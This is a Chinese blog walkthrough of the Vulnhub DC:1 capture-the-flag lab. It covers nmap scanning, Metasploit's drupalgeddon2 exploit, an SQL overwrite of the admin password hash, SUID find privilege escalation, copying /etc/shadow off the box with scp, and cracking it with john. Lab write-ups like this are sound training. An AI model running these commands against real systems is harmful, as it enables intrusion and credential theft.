Vulnhub入门实战1-DC:1

Vulnhub入门实战1-DC:1

DC:1下载链接
在这里插入图片描述
(我这里使用的是vm,渗透工具使用的是kali2019)
下载得到的ova文件直接使用vm导入即可。
这里我使用的是桥接模式。
在这里插入图片描述
靶机进入登录页面就算开启了。
1.使用arp探索存活主机,找到靶机的ip地址。
在这里插入图片描述
找到靶机的ip地址为192.168.199.179

2.使用nmap进行端口扫描(信息收集)。
在这里插入图片描述

参数说明:
-sV:版本探测
-p-:扫描全部端口

根据扫描结果开启了22,80,111,可以进行页面访问。
在这里插入图片描述
百度了一下drupal,发现drupal是一个php编写的web框架,并且存在漏洞。

3.使用msf进行主机渗透。
搜索drupal的渗透攻击模块。
在这里插入图片描述
选取稳定优秀的攻击模块,这里选取exploit/unix/webapp/drupal_drupalgeddon2
使用该模块,进行参数设置。
设置完成后进行攻击。
在这里插入图片描述
当终端出现Meterpreter session 1 opened时,表示攻击成功。

4.进入靶机,输入shell。
在这里插入图片描述
这里直接找到了flag1,打开看一看有什么提示。
在这里插入图片描述
根据提示,我们需要找到web的配置文件,一般在/var/www中。
首先我们使用python,通过反弹得到一个普通用户终端。

python -c ‘import pty;pty.spawn("/bin/sh")

在这里插入图片描述
进入配置文件的目录下。
在这里插入图片描述
找到了配置页面,并同时找到flag2.。

蛮力和字典攻击不是
获得访问权限的唯一方法(您将需要访问权限)。
你可以用这些凭据做什么?

这里可能我们需要进一步提权至root。
配置文件中还给了数据库的账号与密码。
在这里插入图片描述
在这里插入图片描述
成功进入数据库,先查看一下数据库。
在这里插入图片描述
没看到啥有用信息。
于是尝试直接查找users表。
在这里插入图片描述
更新数据库时,需要调动加密脚本对密码进行一个加密。于是调用加密脚本,对已知密码进行一个加密。
在这里插入图片描述
成功得到password的hash值,之后更新数据库。

update drupaldb.users set pass="$S$D8nl1eGZv53TDkwvCG.36JeWpof7yEstYgznbJAcZOQUAF.KhsYX" where name="admin";

在这里插入图片描述
成功修改admin的密码,可以进行登录了。
登录成功后,在find contents中找到flag3。
在这里插入图片描述
点击editor。
在这里插入图片描述

特殊的PERMS 将帮助查找密码——但是您需要-exec 该命令来确定如何获取阴影中的内容。

提示我们获取权限查看shadwo中的内容。

5.获取root权限。
查找具有root权限的SUID文件。
find / -user root -perm -4000 -print 2>/dev/null
在这里插入图片描述

6.通过find命令获取root权限。
mkdir abc
find abc -exec ‘/bin/sh’
在这里插入图片描述
成功提权至root。
7.查看shadow文件。
在这里插入图片描述
找到了flag4。
查看/etc/passwd文件。
在这里插入图片描述
8.破解flag4密码
连接本地服务器,并将/etc/passwd 和/etc/shadow文件传回,进行破解。

使用scp传回文件进行破解。
scp /etc/passwd root@192.168.199.112:/root/桌面
scp /etc/shadow root@192.168.199.112:/root/桌面
在这里插入图片描述

使用unshadow命令,将两个文件合成为一个。
unshadow passwd shadow > dopass
在这里插入图片描述
采用kali自带的john进行破解。
john dopass
在这里插入图片描述
破解出flag4的密码为orange

9.远程登录
通过ssh,远程登录flag4账号。
ssh flag4@192.168.199.179
在这里插入图片描述
成功得到第四个flag。
提示我们用同样的方法得到root权限。
同样通过find命令获得root权限。
mkdir abc
find abc -exec ‘/bin/sh’
在这里插入图片描述
在root下找到最终的flag。
至此五个flag全部集齐,第一次打靶机,有啥不对的地方请指教。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值